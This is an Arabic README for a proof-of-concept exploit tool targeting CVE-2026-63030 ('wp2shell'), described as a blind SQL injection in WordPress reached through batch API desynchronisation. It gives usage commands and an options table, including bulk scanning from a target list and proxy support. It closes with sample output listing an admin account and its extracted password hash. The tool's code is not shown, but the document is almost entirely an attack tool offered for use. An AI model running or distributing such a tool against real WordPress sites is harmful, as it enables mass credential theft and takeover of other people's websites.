
CVE-2026-63030 (wp2shell) إثبات المفهوم.
استغلال حقن SQL أعمى عبر فك تزامن واجهة برمجة التطبيقات بالجملة في ووردبريس
أداة إثبات المفهوم لاستخراج المستخدمين وهاشات كلمات المرور عبر الثغرة CVE-2026-63030 (wp2shell).
python POC.py <target_url> [options]
python POC.py --rest-route http://target.com
| الوسيط | الوصف | الافتراضي |
|---|---|---|
target | رابط الهدف الفردي | - |
-l, --list | ملف يحتوي على قائمة بالأهداف (هدف لكل سطر) | - |
--prefix | بادئة جداول قاعدة البيانات | wp_ |
--rest-route | استخدام ?rest_route= | معطل |
--timeout | مهلة الطلب (بالثواني) | 30 |
--proxy | وكيل HTTP (متوافق مع Burp/ZAP) | لا يوجد |
--max-len | أقصى طول للاستخراج | 255 |
[*] Scanning: http://127.0.0.1/
[*] 1 users found
[+] ID:1 User:admin Hash:$wp$2y$10$Z6gwPduKb7wAbm0bHht1be7SxrgbyxgnbPmTVcVz9nP1KBX811xQy
[*] Requests: 553